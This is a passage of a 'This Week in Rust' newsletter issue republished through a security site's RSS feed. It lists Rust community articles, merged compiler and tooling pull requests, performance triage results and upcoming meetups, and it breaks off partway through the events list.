<guid isPermaLink="true">https://tsecurity.de/de/3672376/tools/this-week-in-rust-this-week-in-rust-660/</guid>
<pubDate>Thu, 16 Jul 2026 07:09:13 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/">Announcing Rust 1.97.0</a></li>
<li><a href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/">crates.io: development update</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://bun.com/blog/bun-in-rust">Rewriting Bun in Rust</a></li>
<li><a href="https://bullmq.io/news/260712/rust-release/">Announcing BullMQ for Rust</a></li>
<li><a href="https://github.com/zs-dima/prost-protovalidate/releases/tag/v0.6.0">prost-protovalidate 0.6 — buf.validate (protovalidate) for prost and buffa: compile-time codegen + runtime CEL, 2872/2872 conformance</a></li>
<li><a href="https://github.com/StaszeKrk/plaza/releases/tag/v1.0.0">plaza 1.0: a ratatui package-manager TUI that searches pacman, the AUR, apt, dnf, and Flatpak at once</a></li>
<li><a href="https://github.com/danube-messaging/danube/releases/tag/v0.15.1">Danube v0.15.1: native Apache Iceberg integration for streaming-to-lakehouse export</a></li>
<li><a href="https://www.willsearch.com.br/sentinel/">Guardian Sentinel. The Terminal User Interface for Guardian Decentralized Database - P2P</a></li>
<li><a href="https://github.com/kunobi-ninja/kobe/releases/tag/v0.33.0">kobe 0.33.0: a Rust operator for instant CI Kubernetes clusters</a></li>
<li><a href="https://navigatorbuilds.github.io/elara-mesh/blog/black-box-for-ai-agents.html">Elara Mesh: what the black box for AI agents actually does</a></li>
<li>
<p><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.10.0">kache 0.10.0: instant download dedup, no more polling</a></p>
</li>
<li>
<p><a href="https://richer-richard.github.io/cochlea/">cochlea 0.1.0: a headless, deterministic audio engine for AI agents</a></p>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://opensourcesecurity.io/2026/2026-07-rfmf-lori-niko/">Open Source Security Podcast: Rust Foundation Maintainers Fund with Lori and Niko</a></li>
<li><a href="https://pulsebeam.dev/blog/moving-to-thread-per-core">Moving a Rust WebRTC SFU to thread-per-core</a></li>
<li><a href="https://abundance.build/blog/2026-07-11-faster-rust-tests-in-ci-with-parallel-steps/">Faster Rust tests in CI with parallel steps</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=fugcSHD-9Jw">The Only Diagram You Need to Understand Rust Ownership</a></li>
<li><a href="https://encore.dev/blog/typescript-parser-wasm">We compiled our TypeScript parser to WASM</a></li>
<li><a href="https://kerkour.com/rust-hype">Understanding the Rust hype for the busy developer</a></li>
<li><a href="https://dev.to/akavlabs_69/i-red-teamed-my-own-llm-security-gateway-in-four-passes-heres-every-gap-i-found-5cl9">I red-teamed my own LLM security gateway (Rust) in four passes — every detection gap and how I closed it</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li>[video] <a href="https://www.youtube.com/watch?v=DJhhy6YQe8k">Backend Concepts in Rust: HTTP Servers</a></li>
<li><a href="https://dystroy.org/blog/picamobile/">Fearless Embedded Rust: A FPV Lego car</a></li>
<li><a href="https://www.aravpanwar.com/writing/building-decayfmt-in-rust/">What I learned building a self-corrupting file format in Rust</a></li>
<li><a href="https://corentin-core.github.io/posts/ruxe-async-runtime-agnostic/">Come Async You Are</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li><a href="https://blog.theembeddedrustacean.com/oxidize-xiao">Oxidize XIAO — An Embedded Rust Community Program</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://crates.io/crates/dashu">dashu</a>, a pure Rust set of libraries of arbitrary precision numbers.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1628">JacobZ</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>



<ul>
<li><a href="https://github.com/supernovae-st/nika/issues/424">Nika - showcase: CSV → chart PNG → markdown report (nika:chart has no example yet)</a></li>
</ul>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>550 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-07-07..2026-07-14">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158931">inline some <code>Symbol</code> functions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157104">predicate/clause cleanups</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158942">remove some AST <code>tokens</code> fields</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159019">resolver: wrap arenas in <code>WorkerLocal</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158794">rework read deduplication with pooled read recorders</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159012">shrink <code>mir::Statement</code> to 40 bytes</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157491">shrink no-op drop elaboration</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158865">specialize common <code>(1, 1)</code> case for arg unification</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158842">use SmallVec for return places in MIR</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158866">add explicit <code>Iterator::count</code> impl for <code>ChunkBy</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157153">allow <code>Allocator</code>s to be used as <code>#[global_allocator]</code>s</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158876">fix multiple logic bugs in <code>Arc::make_mut</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158940">implement feature <code>char_to_u32</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159092">make volatile operations const</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158541">move <code>std::io::Write</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159099">stabilize <code>String::from_utf8_lossy_owned</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/151379">stabilize <code>VecDeque::retain_back</code> from <code>truncate_front</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17199"><code>install</code>: Move --debug to Compilation options</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17204"><code>source</code>: incorrect duplicate package warning</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17202">fix manifest schema generation: <code>TomlDebugInfo</code> enum-variants doesn't renamed</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17198">dont apply host-config gating to stable behavior</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17191">reduce library search path length in new build dir layout</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17168">reduce rustc <code>-L</code> args used in the new <code>build-dir</code> layout</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17149">rename <code>-Zno-embed-metadata</code> to <code>-Zembed-metadata=no</code></a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17203">test: fix race in <code>cargo_compile_with_invalid_code_in_deps</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/15000">add new lints: <code>rest_pattern_accessible_field</code> and <code>unnecessary_rest_pattern</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16965">new lint: <code>definition_in_module_root</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17343"><code>arbitrary_source_item_ordering</code>: add configurable trait impl item ordering modes</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17387"><code>tests_outside_test_module</code>: put code in backticks in the lint message</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17215">count length of the first paragraph by its text</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16980">fix <code>suboptimal_flops</code> false negative with ambiguous float literals</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17416">partly disable <code>unneeded_wildcard_pattern</code> when <code>rest_pattern_accessible_field</code> is enabled</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17404">respect the configured MSRV in <code>implicit_saturating_sub</code>'s <code>if x != 0 { x -= 1 }</code> rewrite</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16513">trigger <code>single_element_loop</code> if the block contains only a final expression</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16808">optimize <code>nonstandard_macro_braces</code> by 99.9683% (1.1b → 351K)</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17381">perf: bail out of the <code>disallowed_methods</code> rule if the disallowed list is empty</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22771">ask for disclosure in AI contributions</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22734">add fixes for array length for <code>type_mismatch</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22741">add parens in transformed dyn type in ref type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22736">avoid panic in merge imports on trailing path separator</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22654">change some things for <code>#[doc = macro!()]</code> expansion</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22770">clamp cttz const-eval result to type width</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22751">correctly handled cfg'ed tail expr, take 2</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22749">crash on code actions when an unresolved module is present</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22707">crash when computing diagnostics with MIR and error types</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22744">don't complete default in default impl</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22283">early late classification of lifetimes</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22583">fix <code>render_const_using_debug_impl</code> constructing outdated std layouts</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22735">fix proc macros <code>TokenStream::from_str()</code> for doc comments</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22464">hide private fields on hover depending on context</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22753">make lsp-server <code>Response</code> type closer aligned to JSON-RPC</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22535">pretty assoc const when trait in macro</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22747">reimplement <code>crate_supports_no_std</code> syntactic heuristic</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22773">resolve non-plain paths in blocks correctly</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22683">support Cargo 1.97.0 lockfile path setting</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22405">hir-ty: walk container exprs for <code>unused_must_use</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22768">fix onEnter erroneously deleting/interpreting <code>$foo</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22726">suggest code action fixes produced from diagnostics under cursor, even if they have effects elsewhere</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22777">treat library files as truly client immutable</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22534">turn <code>BlockLoc</code> into a tracked struct, take 3</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week many new optimizations landed, making this a very good week for performance.
The only real regression was a fix for a miscompile that will likely be re-landed in the future.</p>
<p>Triage done by <strong>@JonathanBrouwer</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=3659db0d3e2cd634c766fcda79ed118eca31a9fd&amp;end=5503df87342a73d0c29126a7e08dc9c1255c46ad&amp;absolute=false&amp;stat=instructions%3Au">3659db0d..5503df87</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.3%</td>
<td>[0.2%, 0.4%]</td>
<td>3</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>0.9%</td>
<td>[0.1%, 2.5%]</td>
<td>25</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-1.2%</td>
<td>[-9.9%, -0.2%]</td>
<td>195</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-3.4%</td>
<td>[-92.1%, -0.1%]</td>
<td>174</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-1.2%</td>
<td>[-9.9%, 0.4%]</td>
<td>198</td>
</tr>
</tbody>
</table>
<p>2 Regressions, 10 Improvements, 10 Mixed; 7 of them in rollups
36 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/212da2d63f1edf2ab22293547a99f0fbf8cb68a8/triage/2026/2026-07-13.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3955">Named <code>Fn</code> trait parameters</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159179">enable <code>unreachable_cfg_select_predicates</code> lint as part of <code>unused</code> lint group</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/156906">Stabilize <code>dyn Allocator</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/146954">Tracking Issue for vec_try_remove</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157226">Partially stabilize <code>box_vec_non_null</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/152761">Never break between empty parens</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1015">Enable <code>-Zpolonius=next</code> on nightly</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1014">Enable <code>-Znext-solver</code> on nightly by default for testing</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1012">Stabilizing the state of the debuginfo test suite</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/922">Optimize <code>repr(Rust)</code> enums by omitting tags in more cases involving uninhabited variants.</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/841">Proposal for Adapt Stack Protector for Rust</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3983">bf16 primitive type</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-15 - 2026-08-12 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-15 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/21k797xr"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Tel Aviv-yafo, IL) | <a href="https://www.meetup.com/rust-tlv/events/">Rust 🦀 TLV</a><ul>
<li><a href="https://www.meetup.com/rust-tlv/events/315676843/"><strong>שיחה חופשית ווירטואלית על ראסט</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/315418155/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Virtual (London, GB) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs/events/">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-08-11 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254776/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-08-12 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Bangalore, IN) | <a href="https://discord.gg/VJyv3NfVdw">Embedded Rust Discord</a><ul>
<li><a href="https://discord.gg/6gwCNpFP?event=1526087936234225814"><strong>Silicon Sundays</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Bangalore, IN) | <a href="https://discord.gg/VJyv3NfVdw">Embedded Rust Discord</a><ul>
<li><a href="https://discord.gg/6gwCNpFP?event=1526087936234225814"><strong>Silicon Sundays</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Mumbai, IN | <a href="https://luma.com/mumbai">Rust Mumbai</a><ul>
<li><a href="https://luma.com/7ksabwbm/"><strong>​Rust Mumbai — July Meetup 🦀</strong></a></li>
</ul>
</li>
<li>2026-07-26 | Pune, MA, IN | <a href="https://www.meetup.com/rust-pune/events/">Rust Pune</a><ul>
<li><a href="https://www.meetup.com/rust-pune/events/315651505/"><strong>Rust Pune: July 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-15 | Dortmund, DE | <a href="https://www.meetup.com/rust-dortmund/events/">Rust Dortmund</a><ul>
<li><a href="https://www.meetup.com/rust-dortmund/events/315496876/"><strong>Teach and Hack at Projektspeicher</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a><ul>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/rust-london-user-group/events/">Rust London User Group</a><ul>
<li><a href="https://www.meetup.com/rust-london-user-group/events/315612916/"><strong>LDN Talks: July 2026 Antithesis Takeover</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
</ul>
</li>
<li>2026-07-29 | Poland, PL | <a href="https://www.meetup.com/rust-poland-meetup">Rust Poland</a><ul>
